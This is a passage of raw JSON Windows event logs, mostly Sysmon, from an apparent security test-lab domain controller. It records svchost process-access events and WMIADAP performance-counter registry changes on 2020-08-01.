05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4019,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4020,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.912\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nTargetProcessId: 4532\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.912","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-02A5-5F25-0000-001050FE0500}","TargetProcessId":"4532","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4021,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.694\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating\r\nDetails: WmiApRpl","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.694","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Details":"WmiApRpl","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1001,"SourceName":"Microsoft-Windows-LoadPerf","ProviderGuid":"{122EE297-BB47-41AE-B265-1CA8D1886D40}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12123,"ProcessID":4532,"ThreadID":876,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Performance counters for the WmiApRpl (WmiApRpl) service were removed successfully. The Record Data contains the new values of the system Last Counter and Last Help registry entries.","Opcode":"Info","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4022,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter\r\nDetails: DWORD (0x00006322)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter","Details":"DWORD (0x00006322)","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4023,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help\r\nDetails: DWORD (0x00006323)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help","Details":"DWORD (0x00006323)","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4024,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4025,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4026,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4027,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4028,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4029,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4030,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\PerfIniFile\r\nDetails: WmiApRpl.ini","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\PerfIniFile","Details":"WmiApRpl.ini","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4031,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.710\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating\r\nDetails: WmiApRpl","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.710","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Details":"WmiApRpl","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4032,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.788\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter\r\nDetails: DWORD (0x000063ca)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.788","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter","Details":"DWORD (0x000063ca)","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4033,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.788\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help\r\nDetails: DWORD (0x000063cb)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 